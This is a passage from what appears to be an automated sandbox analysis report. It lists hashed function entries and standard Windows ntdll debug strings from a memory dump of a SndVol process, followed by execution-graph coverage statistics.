                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2d0de6f1a536bfa14fe53989032a97397166e8f78fb9c628f612a51a4f10f55a
                                                                                                                                                  • Instruction ID: d280e4a21b08f2235ee1206b81e7ad81e76626f6c00715903ad2eab999dd3819
                                                                                                                                                  • Opcode Fuzzy Hash: 2d0de6f1a536bfa14fe53989032a97397166e8f78fb9c628f612a51a4f10f55a
                                                                                                                                                  • Instruction Fuzzy Hash: 99C08033084248BBCB135F45CC01F157F29F794760F044010F5040A571C532DD71E744
                                                                                                                                                  Function 365B340D Relevance: .0, Instructions: 10COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
                                                                                                                                                  • Instruction ID: 0baf30e102dccd2adb25fc699e77bbf7db1d41dea705a144fde5f423a7130359
                                                                                                                                                  • Opcode Fuzzy Hash: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
                                                                                                                                                  • Instruction Fuzzy Hash: 0BC080745715407EEF074700CD14B1C35506F10745FD0017C6A807A491C399E402C614
                                                                                                                                                  Function 366635B6 Relevance: .0, Instructions: 10COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: fcfb85a4c58582e884ff618cf81e7b206b1561464208c9731accca16da9c68f1
                                                                                                                                                  • Instruction ID: 3d26b443dc0e0264aab50bc7cd3afb99e84b4d3895c35f55294b290220e19b69
                                                                                                                                                  • Opcode Fuzzy Hash: fcfb85a4c58582e884ff618cf81e7b206b1561464208c9731accca16da9c68f1
                                                                                                                                                  • Instruction Fuzzy Hash: 13C01231C511249BCF219E15CD44A89B779BB903C0F9100A0D004B3550D634DE41CA90
                                                                                                                                                  Function 365A5E40 Relevance: .0, Instructions: 10COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 87b40be69bb84b8935692bbbf804503f40e9112a4bb32ea9a7600e8e15bbdb5b
                                                                                                                                                  • Instruction ID: 0227428e9d7443a96b6ed9104ab79412c679df61acaef2118f51c7ab6b271011
                                                                                                                                                  • Opcode Fuzzy Hash: 87b40be69bb84b8935692bbbf804503f40e9112a4bb32ea9a7600e8e15bbdb5b
                                                                                                                                                  • Instruction Fuzzy Hash: 0CC08C32080248BBC7125E81CC00F067B2AE790B60F400020B6040A5708532ECA0D988
                                                                                                                                                  Function 36611F13 Relevance: .0, Instructions: 10COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 95fccadb08f9606dfcd38af2f15b62c32522055e8e772f632f64d198668e5d87
                                                                                                                                                  • Instruction ID: ec6f299cdbe6452244b46eed101f9799a4799f1b1ef2b2c95f93e1407d478e2c
                                                                                                                                                  • Opcode Fuzzy Hash: 95fccadb08f9606dfcd38af2f15b62c32522055e8e772f632f64d198668e5d87
                                                                                                                                                  • Instruction Fuzzy Hash: F1D012B092A5C4AED30ACB3894415017EE1FB09B80B4644ADE046CB701C624510AC616
                                                                                                                                                  Function 3661DE9B Relevance: .0, Instructions: 4COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 225c5cfe9ee0beead309f6de9a45ea72b197c9a4dc5d2f991778f8c23b784b0e
                                                                                                                                                  • Instruction ID: 6967f2aeb636b258f5083217be94d18a9baca8802ead2c97ec88c993a5139f40
                                                                                                                                                  • Opcode Fuzzy Hash: 225c5cfe9ee0beead309f6de9a45ea72b197c9a4dc5d2f991778f8c23b784b0e
                                                                                                                                                  • Instruction Fuzzy Hash: 41A022320B0880EFCB0BAF80CE00F00B3B0FF80B80FC008B0E00002830822CE800CA00
                                                                                                                                                  Function 3661DF10 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 225c5cfe9ee0beead309f6de9a45ea72b197c9a4dc5d2f991778f8c23b784b0e
                                                                                                                                                  • Instruction ID: 6967f2aeb636b258f5083217be94d18a9baca8802ead2c97ec88c993a5139f40
                                                                                                                                                  • Opcode Fuzzy Hash: 225c5cfe9ee0beead309f6de9a45ea72b197c9a4dc5d2f991778f8c23b784b0e
                                                                                                                                                  • Instruction Fuzzy Hash: 41A022320B0880EFCB0BAF80CE00F00B3B0FF80B80FC008B0E00002830822CE800CA00
                                                                                                                                                  Function 365D2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                  • API String ID: 48624451-2108815105
                                                                                                                                                  • Opcode ID: b4bab2181c0768562ddf9adc4c068747efe8e68414f48282232668f51f07b74d
                                                                                                                                                  • Instruction ID: b534ce9989e1fde72ebbf19ae809bafca455bc21d24b8aa660aebfc968c58f04
                                                                                                                                                  • Opcode Fuzzy Hash: b4bab2181c0768562ddf9adc4c068747efe8e68414f48282232668f51f07b74d
                                                                                                                                                  • Instruction Fuzzy Hash: AA51E6BAA04216AFEB10CF9CCC8097EF7B8BB482847508179E594D3681D634DE54CBE5
                                                                                                                                                  Function 36642410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                  • API String ID: 48624451-2108815105
                                                                                                                                                  • Opcode ID: 05c90345145a08336f67c99b8a0049a8af31982dbc21723cfe9a918468a8f2c9
                                                                                                                                                  • Instruction ID: 33dff18346e72b9b820e1792c3eb85a908e93f6b653c946e6ec760b8cd0d7887
                                                                                                                                                  • Opcode Fuzzy Hash: 05c90345145a08336f67c99b8a0049a8af31982dbc21723cfe9a918468a8f2c9
                                                                                                                                                  • Instruction Fuzzy Hash: 11512A75A00745AEDB25EF9CCC8057FBBFCDF442C0B608469E496C3645EA74DA40CB65
                                                                                                                                                  Function 365C7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • ExecuteOptions, xrefs: 366046A0
                                                                                                                                                  • Execute=1, xrefs: 36604713
                                                                                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 36604742
                                                                                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 36604787
                                                                                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 36604655
                                                                                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 36604725
                                                                                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 366046FC
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                  • API String ID: 0-484625025
                                                                                                                                                  • Opcode ID: dca220afe5506839d147870cb2d20bbc7e334dd61364d01a029e38a4b3db0d88
                                                                                                                                                  • Instruction ID: c7331871668c46684a814b19991c52534811d3b209a964e2c390157deb1f3c20
                                                                                                                                                  • Opcode Fuzzy Hash: dca220afe5506839d147870cb2d20bbc7e334dd61364d01a029e38a4b3db0d88
                                                                                                                                                  • Instruction Fuzzy Hash: BD5138B5A0021DBBEB109FE5DC89FAE7BA8EF44384F5000B9D505A7590EB709E45CF61
                                                                                                                                                  Function 36666940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                                                  • Instruction ID: e5e1bad6719912fdb7070c9e49ef76fcb0369dec250f04b702283b3ff3bd2a0b
                                                                                                                                                  • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                                                  • Instruction Fuzzy Hash: BA0227B5508341AFD304CF1AE890A6BBBE5EFC4788F508A2DF9858B254DB31E915CB53
                                                                                                                                                  Function 365DB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __aulldvrm
                                                                                                                                                  • String ID: +$-$0$0
                                                                                                                                                  • API String ID: 1302938615-699404926
                                                                                                                                                  • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                  • Instruction ID: b890a1b4789bce2873394ba6c081de92e1fa7a2a423603ff99f7e56f829e8b51
                                                                                                                                                  • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                  • Instruction Fuzzy Hash: B281BEF8E0525A9FEF04CE6DC8917EEBBB3AF45394F644669D860A72D0CB349840CB51
                                                                                                                                                  Function 366420E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                  • String ID: %%%u$[$]:%u
                                                                                                                                                  • API String ID: 48624451-2819853543
                                                                                                                                                  • Opcode ID: c8a1dc455d0758d15c26aa2c73b4591983bd5adeb03c7db6f751fb935c2b9431
                                                                                                                                                  • Instruction ID: bee8a87b27cae52fcf03d9832f59f6e4de423a832f9ef81da372f70e7a2b120d
                                                                                                                                                  • Opcode Fuzzy Hash: c8a1dc455d0758d15c26aa2c73b4591983bd5adeb03c7db6f751fb935c2b9431
                                                                                                                                                  • Instruction Fuzzy Hash: 822186B6E00119ABDB11DF79CC409EE77FCAF54280F540125EA05E3240E731DA11CBA6
                                                                                                                                                  Function 365CBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • RTL: Resource at %p, xrefs: 36607B8E
                                                                                                                                                  • RTL: Re-Waiting, xrefs: 36607BAC
                                                                                                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 36607B7F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                  • API String ID: 0-871070163
                                                                                                                                                  • Opcode ID: 84b52187792f64f189298b2d85e5a3555c5a8687b2459b6f4bc5221bce90ce22
                                                                                                                                                  • Instruction ID: a0139ece154ae995e9e1de3b8d3b72f14df4c61e17bfafc14d41396b5dafc851
                                                                                                                                                  • Opcode Fuzzy Hash: 84b52187792f64f189298b2d85e5a3555c5a8687b2459b6f4bc5221bce90ce22
                                                                                                                                                  • Instruction Fuzzy Hash: F341BC39A447029FE714CE65CC40B5ABBE5EF88761F100A3DE95A9B780DB31E905CF92
                                                                                                                                                  Function 365CB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 3660728C
                                                                                                                                                  Strings
                                                                                                                                                  • RTL: Resource at %p, xrefs: 366072A3
                                                                                                                                                  • RTL: Re-Waiting, xrefs: 366072C1
                                                                                                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 36607294
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                  • API String ID: 885266447-605551621
                                                                                                                                                  • Opcode ID: f77ba6d1aeb2282bb9a45b68468d6dcdf6c9c9e03a468767df99fc68ca47d940
                                                                                                                                                  • Instruction ID: e31cd53d6899e0de923d2e725e0e0fd998275d0698b5f9f2ed7f5831afc0a40d
                                                                                                                                                  • Opcode Fuzzy Hash: f77ba6d1aeb2282bb9a45b68468d6dcdf6c9c9e03a468767df99fc68ca47d940
                                                                                                                                                  • Instruction Fuzzy Hash: A8410375A48356AFE714CE65CC80F56BBA5FF84794F100A39F8949B280DB31E816CBD2
                                                                                                                                                  Function 36642300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                  • String ID: %%%u$]:%u
                                                                                                                                                  • API String ID: 48624451-3050659472
                                                                                                                                                  • Opcode ID: a8d4a0c0156b5d696d416eab50304fec8c6d331db5bd09eeff931dde87b2567b
                                                                                                                                                  • Instruction ID: 7e279beee18c42412673001c088b92c4bf737de2fa35fe0749ae09c0b36848de
                                                                                                                                                  • Opcode Fuzzy Hash: a8d4a0c0156b5d696d416eab50304fec8c6d331db5bd09eeff931dde87b2567b
                                                                                                                                                  • Instruction Fuzzy Hash: 91318476A006199FDB12DF29CC40BEE77BCEB44690F9005A6E849E3240EB309E54CFA5
                                                                                                                                                  Function 365D7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __aulldvrm
                                                                                                                                                  • String ID: +$-
                                                                                                                                                  • API String ID: 1302938615-2137968064
                                                                                                                                                  • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                  • Instruction ID: 0f3f5505df659c0ce6c6ab14f75acf0b5169af8efc68592be0048e5b1da3ce30
                                                                                                                                                  • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                  • Instruction Fuzzy Hash: 6191B474E002179FEB20DE6EC8856EEB7A5EF443A5FA0453AE864E72D0DB309941CB51
                                                                                                                                                  Function 36599126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $$@
                                                                                                                                                  • API String ID: 0-1194432280
                                                                                                                                                  • Opcode ID: c1eb4d8969ce78afd616d708e3240af5da5eba5f80c0422c4d27196f49b24c0d
                                                                                                                                                  • Instruction ID: 955d90ccd1894143123c33fcbbdc9e88f94347c7e5131f070d1b200d0096ffbc
                                                                                                                                                  • Opcode Fuzzy Hash: c1eb4d8969ce78afd616d708e3240af5da5eba5f80c0422c4d27196f49b24c0d
                                                                                                                                                  • Instruction Fuzzy Hash: D8813BB5D10269DBDB21CF94CC44BDEB7B8AF48750F4041EAA909B7280D7319E84CFA5

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:1.5%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                  Total number of Nodes:419
                                                                                                                                                  Total number of Limit Nodes:14
